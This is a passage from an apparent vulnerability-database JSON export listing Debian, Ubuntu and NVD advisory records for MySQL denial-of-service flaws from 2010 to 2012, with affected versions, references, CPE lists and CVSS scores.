ROLLUP together.\n An authenticated user could crash the server.\n\n\nCVE-2010-3838\n\n It was discovered that MySQL incorrectly handled certain queries using a\n mixed list of numeric and LONGBLOB arguments to the GREATEST() or\n LEAST() functions.\n An authenticated user could crash the server.\n\n\nCVE-2010-3840\n\n It was discovered that MySQL incorrectly handled improper WKB data\n passed to the PolyFromWKB() function.\n An authenticated user could crash the server.\n\n\nFor the stable distribution (lenny), these problems have been fixed\nin version 5.0.51a-24+lenny5\n\nThe testing (squeeze) and unstable (sid) distribution do not contain\nmysql-dfsg-5.0 anymore.\n\nWe recommend that you upgrade your mysql-dfsg-5.0 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 1, "reporter": "Debian", "published": "2011-01-14T09:07:35", "title": "[SECURITY] [DSA-2143-1] New mysql-dfsg-5.0 packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:47", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3836", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2011-01-14T09:07:35", "id": "DEBIAN:DSA-2143-1:3EA54", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00007.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:17", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3680", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3838", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3837", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3682", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3840", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3677", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3839", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3683", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3681", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3834", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3833", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3836", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3678", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3679", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-2008", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3835"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "5.1.37-1ubuntu5.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "5.1.49-1ubuntu8.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "5.0.22-0ubuntu6.06.15", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "5.0.51a-3ubuntu5.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.1.41-3ubuntu12.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}], "description": "It was discovered that MySQL incorrectly handled certain requests with the UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)\n\nIt was discovered that MySQL incorrectly handled joins involving a table with a unique SET column. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3677)\n\nIt was discovered that MySQL incorrectly handled NULL arguments to IN() or CASE operations. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3678)\n\nIt was discovered that MySQL incorrectly handled malformed arguments to the BINLOG statement. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3679)\n\nIt was discovered that MySQL incorrectly handled the use of TEMPORARY InnoDB tables with nullable columns. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3680)\n\nIt was discovered that MySQL incorrectly handled alternate reads from two indexes on a table using the HANDLER interface. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3681)\n\nIt was discovered that MySQL incorrectly handled use of EXPLAIN with certain queries. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3682)\n\nIt was discovered that MySQL incorrectly handled error reporting when using LOAD DATA INFILE and would incorrectly raise an assert in certain circumstances. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-3683)\n\nIt was discovered that MySQL incorrectly handled propagation during evaluation of arguments to extreme-value functions. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 8.04 LTS, 9.10, 10.04 LTS and 10.10. (CVE-2010-3833)\n\nIt was discovered that MySQL incorrectly handled materializing a derived table that required a temporary table for grouping. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2010-3834)\n\nIt was discovered that MySQL incorrectly handled certain user-variable assignment expressions that are evaluated in a logical expression context. An authenticated user could exploit this to make MySQL crash, causing a denial of service. This issue only affected Ubuntu 8.04 LTS, 9.10, 10.04 LTS and 10.10. (CVE-2010-3835)\n\nIt was discovered that MySQL incorrectly handled pre-evaluation of LIKE predicates during view preparation. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2010-3836)\n\nIt was discovered that MySQL incorrectly handled using GROUP_CONCAT() and WITH ROLLUP together. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2010-3837)\n\nIt was discovered that MySQL incorrectly handled certain queries using a mixed list of numeric and LONGBLOB arguments to the GREATEST() or LEAST() functions. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2010-3838)\n\nIt was discovered that MySQL incorrectly handled queries with nested joins when used from stored procedures and prepared statements. An authenticated user could exploit this to make MySQL hang, causing a denial of service. This issue only affected Ubuntu 9.10, 10.04 LTS and 10.10. (CVE-2010-3839)\n\nIt was discovered that MySQL incorrectly handled improper WKB data passed to the PolyFromWKB() function. An authenticated user could exploit this to make MySQL crash, causing a denial of service. (CVE-2010-3840)", "edition": 3, "reporter": "Ubuntu", "published": "2010-11-11T00:00:00", "title": "MySQL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2010-11-11T00:00:00", "id": "USN-1017-1", "href": "https://usn.ubuntu.com/1017-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:26", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4098", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0494", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-4456", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0490", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0489", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3680", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3838", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0488", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3837", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0101", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0102", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0116", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0493", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0115", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0496", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3682", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0491", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3840", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-3963", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1849", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3677", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2446", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0113", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3839", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-7247", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1850", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3683", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0114", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3681", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1621", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4484", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0120", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2262", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3834", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3833", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0486", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0487", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3836", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-5925", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0087", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0492", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1848", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4030", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3678", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0112", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0118", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0485", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1626", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0495", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3679", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-2008", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0119", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4019", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0117", "https://people.canonical.com/~ubuntu-security/cve/CVE-2012-0075", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3835"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "5.0.95-0ubuntu1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "5.1.61-0ubuntu0.11.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "5.1.61-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "5.1.61-0ubuntu0.11.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "5.1.61-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "mysql-server-5.1", "operator": "lt"}], "description": "Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.1.61 in Ubuntu 10.04 LTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. Ubuntu 8.04 LTS has been updated to MySQL 5.0.95.\n\nIn addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.\n\nPlease see the following for more information:\n\n<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html> <http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html> <http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html>", "edition": 3, "reporter": "Ubuntu", "published": "2012-03-12T00:00:00", "title": "MySQL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-0075", "CVE-2012-0489", "CVE-2009-2446", "CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2008-4456", "CVE-2010-3839", "CVE-2009-4030", "CVE-2010-3835", "CVE-2012-0112", "CVE-2010-3681", "CVE-2010-3833", "CVE-2012-0491", "CVE-2012-0496", "CVE-2012-0113", "CVE-2007-5925", "CVE-2010-3840", "CVE-2012-0484", "CVE-2012-0494", "CVE-2012-0115", "CVE-2010-1621", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-1626", "CVE-2008-4098", "CVE-2010-2008", "CVE-2012-0101", "CVE-2010-3836", "CVE-2012-0488", "CVE-2010-3683", "CVE-2010-3677", "CVE-2008-3963", "CVE-2012-0493", "CVE-2010-1850", "CVE-2012-0114", "CVE-2010-3834", "CVE-2012-0495", "CVE-2010-3838", "CVE-2012-0119", "CVE-2012-0492", "CVE-2012-0116", "CVE-2012-0485", "CVE-2010-1848", "CVE-2008-7247", "CVE-2012-0117", "CVE-2012-0487", "CVE-2012-0087", "CVE-2012-0490", "CVE-2010-1849", "CVE-2012-0120", "CVE-2009-4019", "CVE-2011-2262", "CVE-2012-0118", "CVE-2009-4484", "CVE-2012-0102", "CVE-2012-0486"], "modified": "2012-03-12T00:00:00", "id": "USN-1397-1", "href": "https://usn.ubuntu.com/1397-1/", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-01-05T12:20:10", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/64687", "http://www.vupen.com/english/advisories/2011/0170", "http://www.ubuntu.com/usn/USN-1397-1", "http://www.securityfocus.com/bid/42638", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html", "http://bugs.mysql.com/bug.php?id=54393", "http://www.mandriva.com/security/advisories?name=MDVSA-2011:012", "https://bugzilla.redhat.com/show_bug.cgi?id=628062", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:155", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://www.vupen.com/english/advisories/2011/0133", "http://www.openwall.com/lists/oss-security/2010/09/28/10"], "description": "Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.", "edition": 3, "reporter": "NVD", "published": "2011-01-11T15:00:01", "title": "CVE-2010-3679", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:10", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3679"], "scanner": [], "modified": "2018-01-04T21:29:02", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3679", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:11", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://bugs.mysql.com/bug.php?id=51875", "https://bugzilla.redhat.com/show_bug.cgi?id=640865", "http://www.ubuntu.com/usn/USN-1397-1", "http://www.redhat.com/support/errata/RHSA-2010-0824.html", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64838", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://www.securityfocus.com/bid/43676", "http://www.debian.org/security/2011/dsa-2143", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:223", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html", "http://lists.mysql.com/commits/117094"], "description": "The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.", "edition": 3, "reporter": "NVD", "published": "2011-01-14T14:02:44", "title": "CVE-2010-3840", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:11", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3840"], "scanner": [], "modified": "2018-01-04T21:29:04", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1.49", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.44", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.1.48", "cpe:/a:mysql:mysql:5.1.46:sp1", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.50", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.49:sp1", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.47", "cpe:/a:mysql:mysql:5.1.41", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2010-3840", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3840", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:20:11", "references": ["http://www.vupen.com/english/advisories/2011/0170", "http://www.vupen.com/english/advisories/2011/0345", "http://dev.mysql.com/doc/refman/5.5/en/news-5-5-6.html", "http://www.ubuntu.com/usn/USN-1397-1", "http://support.apple.com/kb/HT4723", "http://www.vupen.com/english/advisories/2011/0105", "http://www.redhat.com/support/errata/RHSA-2010-0825.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:222", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-92.html", "http://www.securityfocus.com/bid/43676", "http://www.debian.org/security/2011/dsa-2143", "http://www.turbolinux.co.jp/security/2011/TLSA-2011-3j.txt", "http://lists.apple.com/archives/security-announce/2011//Jun/msg00000.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:223", "http://bugs.mysql.com/bug.php?id=54461", "https://bugzilla.redhat.com/show_bug.cgi?id=640858", "http://www.ubuntu.com/usn/USN-1017-1", "http://www.redhat.com/support/errata/RHSA-2011-0164.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/64840"], "description": "MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is \"processed using an intermediate temporary table.\"", "edition": 3, "reporter": "NVD", "published": "2011-01-14T14:02:43", "title": "CVE-2010-3838", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:20:11", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2010-3838"], "scanner": [], "modified": "2018-01-04T21:29:03", "cpe": ["cpe:/a:mysql:mysql:5.1.43", "cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.42", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.5.4", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.90", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.5.0", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.9", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.43:sp1", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.88", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.1.49", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.67", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.1.46", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.86", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.5.3", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.1.45", "cpe:/a:mysql:mysql:5.0.45b", "cpe:/a:mysql:mysql:5.0.54", 